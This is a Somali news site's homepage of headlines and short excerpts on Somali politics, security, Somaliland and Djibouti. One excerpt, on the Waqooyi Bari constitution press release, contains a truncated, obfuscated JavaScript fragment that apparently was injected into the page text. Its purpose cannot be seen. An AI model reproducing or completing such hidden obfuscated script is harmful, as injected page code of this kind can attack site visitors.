Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Taliyaha Booliiska oo Shir Guddoomiyey, Xisaabtan iyo Tayeyn Lagu Soo Rogay Ciidanka

Muqdisho — Taliyaha Ciidanka Booliiska Soomaaliyeed, Sarreeye Guuto Asad Cismaan Cabdullaahi, ayaa maanta shir guddoomiyey kulanka toddobaadlaha ah ee hoggaanada iyo fadhiyada madaxa bannaan...

Golaha Wasiirrada Soomaaliya oo amaanay Ciidanka Qaranka iyo Bulshada Gedo

Muqdisho — Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya ayaa si weyn uga bogaadiyey Ciidanka Qaranka masuuliyadda iyo xilkasnimada ay muujiyeen, si looga hortago khasaaraha...

War-saxaafadeed: Soo gabagabeynta shirweynaha dhismaha iyo Ansixinta Dastuurka Dowlad Goboleedka Waqooyi Bari Soomaaliya.

LAASCAANOOD - Dowladda ayaa soo saartay War-saxaafadeed ku saabsan Soo gabagabeynta shirweynaha dhismaha iyo Ansixinta Dastuurka Dowlad Goboleedka Waqooyi Bari Soomaaliya.     function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...

Tirada Ciidamada Jabuuti ee jooga Soomaaliya oo la kordhinayo

MUQDISHO — Soomaaliya iyo Jabuuti ayaa Arbacadii shalay kala saxiixday heshiis ogolaanaya in la kordhiyo tirada ciidamada Jabuuti ee ku sugan gudaha Soomaaliya si...

Wajiga cusub ee dhismaha SSC-Khaatumo oo la guda galay – Xildhibaanada la soo xulayo

Laascaanood – Ergada dhiseysa Maamulka Waqooyi Bari Soomaaliya ayaa u gudbaysa wejiyada xiga ee dhismaha maamulka cusub, iyagoo bilaabaya soo xulista xildhibaanada dowlad-goboleedka, sida...

Somaliland oo Mareykanka u bandhigtay saldhig ciidan iyo heshiis macdanta si ay u hesho aqoonsi

Hargeysa – Sida lagu sheegay warbixin uu daabacay Bloomberg, Somaliland ayaa u bandhigtay Mareykanka fursad uu saldhig ciidan badeed uga dhisto xeebteeda u dhow...

Guddoomiyaha Golaha Shacabka oo Booqasho Ku Tegay Gobolka Bakool

Xuddur, Bakool — Guddoomiyaha Golaha Shacabka ee Baarlamaanka Soomaaliya, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa maanta booqasho rasmi ah ku yimid magaalada Xuddur,...

Ra’iisul Wasaaraha oo la kulmay Wakiilka Midowga Afrika ee Soomaaliya

Muqdisho, Luulyo 30, 2025 — Ra’iisul Wasaaraha Soomaaliya, Xamsa Cabdi Barre, ayaa maanta xafiiskiisa ku qaabilay Wakiilka Gaarka ah ee Guddoomiyaha Guddiga Midowga Afrika...

Madaxweynaha Somaliland oo baaq u diray Shacabka iyo Ganacsatada

Hargeysa, Luulyo 30 — Madaxweynaha Somaliland, Cabdiraxmaan Cirro, ayaa magaalada Hargeysa kula kulmay qaybo kamid ah shacabka deegaanka, isaga oo si qoto dheer uga...

Beledweyne oo laga wado abaabul weerar cusub oo lagu qaadayo Al-Shabaab

Beledweyne — Xerada Lama-Galaay ee magaalada Beledweyne ayaa haatan lagu wadaa kulamo iyo qorsheyn lagu diyaarinayo duullaan lagu soo celinayo degmooyinka Moqokori iyo Maxaas...

WARAR KALE

Somali Minister Mukhtar Robow Delivers Hassan Sheikh’s Message to Mauritanian President

NOUAKCHOTT, Mauritania — Mauritanian President Mohamed Ould Cheikh El Ghazouani has received a special message from Somali President Hassan Sheikh Mohamud, delivered by Somalia's...

South West Leader Madobe Meets Hariin Clan Elders and Politicians in Baidoa

BAIDOA, Somalia — South West State leader Sheikh Adan Mohamed Nur Madobe has met politicians, traditional elders and community figures from the Hariin clan...

Djibouti Faces Fresh Pressure as 1,400 Yemenis Arrive Amid Escalating Conflict

DJIBOUTI — Djibouti is facing fresh humanitarian and security pressure after around 1,400 Yemenis arrived in the country within 24 hours, fleeing escalating fighting...